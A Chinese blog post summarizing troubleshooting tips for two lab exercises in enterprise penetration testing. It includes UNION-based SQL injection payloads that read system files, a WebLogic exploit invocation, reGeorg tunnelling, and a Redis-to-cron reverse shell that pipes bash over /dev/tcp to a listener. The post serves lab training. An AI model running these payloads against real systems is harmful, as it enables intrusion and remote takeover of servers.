企业环境渗透1&2问题总结

做实验时遇到的问题汇总,希望能帮助到大家👇
原文见:https://goen-kkk.github.io/

企业环境渗透1

任务二 sql注入

联合查询失败问题

可以大小写绕过

?id=-1 UniOn SeleCt 1,2,3,4,5,6,7,8,9,0

在这里插入图片描述

发现 1 和 3 为显示位 ,接下来就可以进行一系列操作啦

  • 确定当前使用的数据库

    ?id=-1 UniOn SeleCt 1,2,database(),4,5,6,7,8,9,0
    

在这里插入图片描述

  • 确定当前使用的用户

    ?id=-1 UniOn SeleCt 1,2,user(),4,5,6,7,8,9,0
    

    在这里插入图片描述

  • 读取 apache 的配置文件,得到网站根目录

    ?id=-1 UniOn SeleCt 1,2,load_file(“/etc/httpd/conf/httpd.conf”),4,5,6,7,8,9,0
    

    在这里插入图片描述

这里汇总了一下常见的 SQL 注入 pypass 方法,大家也可以试试其他方法
在这里插入图片描述


任务三

打开虚拟终端

我之前没明白教程上的终端图从哪来的

在这里插入图片描述

打开之后长这样

在这里插入图片描述

任务四

远程连接失败问题

远程登录时,出现以下报错

在这里插入图片描述

更改了 reGeorgSocksProxy.py 代理设置的端口,从 8080 更改为 8888,解决了远

程登录的问题。



企业环境渗透2

首先操作机应该是192.168.2.200,只有这台机器是kali Linux机,我登了半天,坑人。

任务一

.jar文件运行命令

java -jar WebLogic_EXP.jar


任务二

打开网页

漏洞信息网页可以在本机上打开,虚拟机无法访问

https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/


任务三

查找漏洞字段的方法
  1. 访问http://192.168.2.11/wp-admin页面,可以看到左上角有 Length 字样,需要测试 length 是哪个字段的长度
    在这里插入图片描述

  2. 使用Burpsuite的repeater模块探测漏洞字段。
    在这里插入图片描述

  3. 修改host字段,发现Host字段的长度即是响应中length的值,即漏洞字段为Host

在这里插入图片描述


任务五

上传avi文件

必须是以123.avi的文件名上传,才会有下载的文件,在/download出下载

修改porxychains.conf

路径:/etc/proxychains.conf

shell 弹不出来

按照网上教程的方法,一直弹不出1.11的shell,这里提供另一种方法:

  1. 按步骤得到456.avi

  2. 开启一个终端,打开任务四中的代理(reGeorgeSocksProxy)

  3. 打开另一个终端,监听端口5555:“nc -lvp 5555”

  4. 再打开另一个终端,输入指令“proxychains redis-cli -h 192.168.1.11”(最好新打开,不要用之前的)

  5. 输入命令:

    > set a "\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.2.200/5555 0>&1\n"
    > ccoonnffiigg set dir /var/spool/cron
    > ccoonnffiigg set dbfilename root
    > save
    
  6. 在监听5555端口的终端得到反弹的shell

在这里插入图片描述

还有一个问题,shell维持的时间可能比较短,很拼手速,一个小tips:可以先打出命令,登弹出时,直接回车就行。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【为什么学习这门课程?】 企业渗透测试和持续监控在线课程是白帽艺术系列视频的一部分,通过内部/外部侦察、社会工程、网络和漏洞扫描,逐步示范了对企业网络进行安全评估(渗透测试)的现实场景。您还将学习如何执行web应用程序测试、内部网络测试、权限升级、密码破解和数据泄露,以探测和减轻企业漏洞。本课程最后介绍了报告和评估方法,以确保您的企业环境在不断变化的威胁和安全漏洞面前保持安全。【本门课程亮点】 帮助您学习在企业网络环境中执行高级渗透测试所需的技能。课程包含循序渐进的指导,这样您就可以学习道德白帽、渗透测试和安全态势评估。您还将学习行业中许多不同的前沿安全技能相关的各种概念。课程包含真实场景的多媒体教程和实践演示,想要成为职业道德白帽或跟上不断演变的漏洞威胁的人,可以通过学习本课程了解企业网络安全的弱点。 【讲师介绍】  Omar Santos(奥马尔·桑托斯)—— 思科PSIRT首席工程师、作家Omar Santos(奥马尔·桑托斯)是思科产品安全事件响应团队(PSIRT)的首席工程师,指导和领导团队工程师和事件经理对安全漏洞进行调查和解决。桑托斯著有20多本网络安全方面的专著,在全球拥有大量读者,他制作的大量白皮书、文章、安全配置指南等相关内容被大量媒体引用,如《共和报》、《连线》、《ZDNet》、《网络独家新闻》、《TechCrunch》、《财富》、《Ars Technica》等等。同时,他还是网络安全社区的一名活跃成员,他参与很多重要行业的网络安全倡议和标准制定。他还会积极帮助企业、学术机构、州和地方执法机构,提高关键基础设施的安全性。【课程收获】 1、计划、建立和管理一个红客队伍来进行企业白帽活动 2、使用被动/主动侦察、社会工程、网络和漏洞扫描来探测企业漏洞3、确定目标主机、部署工具危害web应用程序4、学习如何渗透网络,扫描易受危害的目标和开源软件,如何通过夺旗以确定企业的弱点 5、使用经过验证的方法和工具升级网络访问权限 6、执行密码破解,破解网络和用户凭证,获取敏感数据,并掩盖过程踪迹 7、测试云服务的漏洞 8、对渗透测试事件进行报告,并建立一个持续的监控基础设施,以缓解正在进行的威胁 【面向人群】 1、所有开始从事职业白帽和渗透测试工作的网络安全专业人员 3、准备考取CompTIA PenTest+,道德白帽认证(CEH),危害安全专家认证(OSCP),以及其他道德白帽认证的人3、任何想要学习成为道德白帽所需技能的网络安全专业人员,或者想要学习更多关于一般安全渗透测试方法和概念的网络安全专业人员

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值